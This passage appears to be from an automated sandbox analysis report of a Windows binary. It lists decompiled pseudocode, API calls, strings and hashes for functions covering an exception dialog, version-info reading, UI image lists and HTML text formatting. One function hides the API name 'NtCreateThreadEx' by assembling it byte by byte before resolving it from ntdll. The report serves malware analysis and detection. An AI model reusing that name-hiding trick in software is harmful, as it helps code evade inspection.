                                                                                                        • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                        0x00408ae3
                                                                                                        0x00408aeb
                                                                                                        0x00408af3
                                                                                                        0x00408b76
                                                                                                        0x00408b8a
                                                                                                        0x00408b91
                                                                                                        0x00408b98
                                                                                                        0x00408bb1
                                                                                                        0x00408bb3
                                                                                                        0x00408bc6
                                                                                                        0x00408bcc
                                                                                                        0x00408bda
                                                                                                        0x00408be0
                                                                                                        0x00408bf3
                                                                                                        0x00408bfa
                                                                                                        0x00408c0b
                                                                                                        0x00408c12
                                                                                                        0x00408c17
                                                                                                        0x00408c1a
                                                                                                        0x00408c2c
                                                                                                        0x00408c39
                                                                                                        0x00408c3d
                                                                                                        0x00408c3f
                                                                                                        0x00408c41
                                                                                                        0x00408c52
                                                                                                        0x00408c58
                                                                                                        0x00408c58
                                                                                                        0x00408c6f
                                                                                                        0x00408c71
                                                                                                        0x00408c73
                                                                                                        0x00408c83
                                                                                                        0x00408c89
                                                                                                        0x00408c89
                                                                                                        0x00408c8a
                                                                                                        0x00408c8f
                                                                                                        0x00408c91
                                                                                                        0x00408c9a
                                                                                                        0x00408c93
                                                                                                        0x00408c93
                                                                                                        0x00408c93
                                                                                                        0x00408c9f
                                                                                                        0x00408ca5
                                                                                                        0x00408caf
                                                                                                        0x00408cbc
                                                                                                        0x00408cc2
                                                                                                        0x00408cc7
                                                                                                        0x00408ccd
                                                                                                        0x00408cd0
                                                                                                        0x00408cd6
                                                                                                        0x00408cd7
                                                                                                        0x00408cd8
                                                                                                        0x00408cde
                                                                                                        0x00408ce3
                                                                                                        0x00408ceb
                                                                                                        0x00408cfe
                                                                                                        0x00408d03
                                                                                                        0x00408d06
                                                                                                        0x00408d0c
                                                                                                        0x00408d21
                                                                                                        0x00408d27
                                                                                                        0x00408d0c
                                                                                                        0x00000000
                                                                                                        0x00408ca7
                                                                                                        0x00408ca7
                                                                                                        0x00408cad
                                                                                                        0x00408d28
                                                                                                        0x00408d2e
                                                                                                        0x00408d35
                                                                                                        0x00408d36
                                                                                                        0x00408d42
                                                                                                        0x00408d48
                                                                                                        0x00408d4e
                                                                                                        0x00408d54
                                                                                                        0x00408d5a
                                                                                                        0x00408d60
                                                                                                        0x00408d66
                                                                                                        0x00408d6c
                                                                                                        0x00408d72
                                                                                                        0x00408d73
                                                                                                        0x00408d7f
                                                                                                        0x00408d85
                                                                                                        0x00408d8a
                                                                                                        0x00408d8f
                                                                                                        0x00408d90
                                                                                                        0x00408da8
                                                                                                        0x00408db9
                                                                                                        0x00408dbf
                                                                                                        0x00408dc5
                                                                                                        0x00408dc5
                                                                                                        0x00000000
                                                                                                        0x00408cad
                                                                                                        0x00408ca5
                                                                                                        0x00408af6
                                                                                                        0x00408afc
                                                                                                        0x00408b07
                                                                                                        0x00408b2a
                                                                                                        0x00408b38
                                                                                                        0x00408b53
                                                                                                        0x00408b56
                                                                                                        0x00408b62
                                                                                                        0x00408b6a
                                                                                                        0x00408b6a
                                                                                                        0x00408b2a
                                                                                                        0x00408b07
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                        • {Unknown}, xrefs: 00408BA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                        • API String ID: 4111938811-1819279800
                                                                                                        • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                        • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                        • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                        • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                        0x0040b04d
                                                                                                        0x0040b05e
                                                                                                        0x0040b060
                                                                                                        0x0040b063
                                                                                                        0x0040b06a
                                                                                                        0x0040b06d
                                                                                                        0x0040b076
                                                                                                        0x0040b07b
                                                                                                        0x0040b07e
                                                                                                        0x0040b084
                                                                                                        0x0040b08e
                                                                                                        0x0040b0a8
                                                                                                        0x0040b0aa
                                                                                                        0x0040b0ad
                                                                                                        0x0040b0b0
                                                                                                        0x0040b0b3
                                                                                                        0x0040b0b6
                                                                                                        0x0040b0b8
                                                                                                        0x0040b0bb
                                                                                                        0x0040b0be
                                                                                                        0x0040b0c1
                                                                                                        0x0040b0c4
                                                                                                        0x0040b0c7
                                                                                                        0x0040b0ca
                                                                                                        0x0040b0cd
                                                                                                        0x0040b0cd
                                                                                                        0x0040b0e5
                                                                                                        0x0040b11f
                                                                                                        0x0040b128
                                                                                                        0x0040b0e7
                                                                                                        0x0040b0e7
                                                                                                        0x0040b0f1
                                                                                                        0x0040b0f2
                                                                                                        0x0040b0f3
                                                                                                        0x0040b0fb
                                                                                                        0x0040b0fd
                                                                                                        0x0040b0fe
                                                                                                        0x0040b11d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040b11d
                                                                                                        0x0040b13c
                                                                                                        0x0040b151
                                                                                                        0x0040b166
                                                                                                        0x0040b17b
                                                                                                        0x0040b190
                                                                                                        0x0040b1a5
                                                                                                        0x0040b1ba
                                                                                                        0x0040b1cf
                                                                                                        0x0040b1d6
                                                                                                        0x0040b1d7
                                                                                                        0x0040b1d8
                                                                                                        0x0040b1de
                                                                                                        0x0040b1e3

                                                                                                        APIs
                                                                                                        • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                        • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                        • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                        • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                        • wcscpy.MSVCRT ref: 0040B128
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                        • API String ID: 1223191525-1542517562
                                                                                                        • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                        • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                        • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                        • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                        0x0040a1f8
                                                                                                        0x0040a26d
                                                                                                        0x00000000
                                                                                                        0x0040a26f
                                                                                                        0x0040a205
                                                                                                        0x0040a20b
                                                                                                        0x0040a20d
                                                                                                        0x0040a213
                                                                                                        0x0040a214
                                                                                                        0x0040a215
                                                                                                        0x0040a216
                                                                                                        0x0040a217
                                                                                                        0x0040a219
                                                                                                        0x0040a21f
                                                                                                        0x0040a223
                                                                                                        0x0040a227
                                                                                                        0x0040a22b
                                                                                                        0x0040a22f
                                                                                                        0x0040a233
                                                                                                        0x0040a237
                                                                                                        0x0040a23b
                                                                                                        0x0040a23f
                                                                                                        0x0040a243
                                                                                                        0x0040a247
                                                                                                        0x0040a24b
                                                                                                        0x0040a24f
                                                                                                        0x0040a253
                                                                                                        0x0040a257
                                                                                                        0x0040a25b
                                                                                                        0x0040a25f
                                                                                                        0x0040a269
                                                                                                        0x00000000
                                                                                                        0x0040a26c
                                                                                                        0x0040a271

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                        • API String ID: 2574300362-1257427173
                                                                                                        • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                        • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                        • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                        • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                        0x00407f9b
                                                                                                        0x00407fa3
                                                                                                        0x00407fad
                                                                                                        0x00407fb9
                                                                                                        0x0040802e
                                                                                                        0x00408032
                                                                                                        0x00408038
                                                                                                        0x0040803e
                                                                                                        0x00407fbb
                                                                                                        0x00407fc9
                                                                                                        0x00407fd0
                                                                                                        0x00407fe0
                                                                                                        0x00407fe5
                                                                                                        0x00407ff7
                                                                                                        0x00408015
                                                                                                        0x0040801b
                                                                                                        0x00408021
                                                                                                        0x00408021
                                                                                                        0x00408051
                                                                                                        0x00408051
                                                                                                        0x00408059
                                                                                                        0x00408065
                                                                                                        0x00408069
                                                                                                        0x0040806f
                                                                                                        0x00408087
                                                                                                        0x00408087
                                                                                                        0x0040809c
                                                                                                        0x004080bb
                                                                                                        0x004080d1
                                                                                                        0x004080de
                                                                                                        0x004080e2
                                                                                                        0x004080ea
                                                                                                        0x004080fb
                                                                                                        0x00408105
                                                                                                        0x00408115
                                                                                                        0x00408121
                                                                                                        0x00408127
                                                                                                        0x00408150

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00407FD0
                                                                                                        • memset.MSVCRT ref: 00407FE5
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                        • LoadImageW.USER32 ref: 004080B4
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                        • LoadImageW.USER32 ref: 004080D1
                                                                                                        • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                        • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                        • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                        • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                        • DeleteObject.GDI32(?), ref: 00408121
                                                                                                        • DeleteObject.GDI32(?), ref: 00408127
                                                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 304928396-0
                                                                                                        • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                        • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                        • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                        • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 69%
                                                                                                        			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                        0x0040ae90
                                                                                                        0x0040aeab
                                                                                                        0x0040aeb2
                                                                                                        0x0040aec0
                                                                                                        0x0040aec7
                                                                                                        0x0040aecc
                                                                                                        0x0040aed3
                                                                                                        0x0040aeda
                                                                                                        0x0040aee1
                                                                                                        0x0040aee1
                                                                                                        0x0040aee7
                                                                                                        0x0040aeea
                                                                                                        0x0040aeed
                                                                                                        0x0040aef9
                                                                                                        0x0040aefe
                                                                                                        0x0040af05
                                                                                                        0x0040af07
                                                                                                        0x0040af08
                                                                                                        0x0040af13
                                                                                                        0x0040af18
                                                                                                        0x0040af19
                                                                                                        0x0040af26
                                                                                                        0x0040af2b
                                                                                                        0x0040af2b
                                                                                                        0x0040af2e
                                                                                                        0x0040af34
                                                                                                        0x0040af43
                                                                                                        0x0040af44
                                                                                                        0x0040af4f
                                                                                                        0x0040af54
                                                                                                        0x0040af55
                                                                                                        0x0040af62
                                                                                                        0x0040af67
                                                                                                        0x0040af70
                                                                                                        0x0040af76
                                                                                                        0x0040af7a
                                                                                                        0x0040af82
                                                                                                        0x0040af88
                                                                                                        0x0040af8d
                                                                                                        0x0040af97
                                                                                                        0x0040af9f
                                                                                                        0x0040afa5
                                                                                                        0x0040afa9
                                                                                                        0x0040afb1
                                                                                                        0x0040afb7
                                                                                                        0x0040afbd

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
